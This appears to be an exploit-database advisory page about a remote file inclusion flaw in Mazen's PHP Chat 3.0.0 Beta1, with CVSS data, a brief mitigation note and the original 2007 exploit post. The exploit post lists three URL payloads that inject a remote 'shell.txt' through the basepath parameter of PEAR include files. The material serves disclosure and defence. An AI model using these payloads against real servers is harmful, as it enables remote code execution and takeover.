header-logo
Suggest Exploit
vendor:
Mazen's PHP Chat
by:
ThE TiGeR
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Mazen's PHP Chat
Affected Version From: 3.0.0 Beta1
Affected Version To: 3.0.0 Beta1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Mazen’s PHP Chat V3.0.0 Beta1 Remote file inclusion

The vulnerability allows an attacker to include a remote file on the victim's server, potentially leading to remote code execution.

Mitigation:

The vulnerability can be mitigated by validating and sanitizing user input, and by implementing proper file inclusion techniques.
Source

Exploit-DB raw data:

#Mazen's PHP Chat V3.0.0 Beta1 Remote file inclusion

#Download script : http://www.scriptbrasil.com.br/script/php/bate_papo/mazen_phpopenchmt221.tar.gz

#Thanks Str0ke :D

#Exploit :

#http://victim.com/[chat_path]/include/pear/ITX.php?basepath=shell.txt?
#http://victim.com/[chat_path]/include/pear/IT_Error.php?basepath=shell.txt?
#http://victim.com/[chat_path]/include/pear/IT.php?basepath= shell.txt?

#Discovered by ThE TiGeR

#Miro_Tiger[at]Hotmail.com

# milw0rm.com [2007-05-26]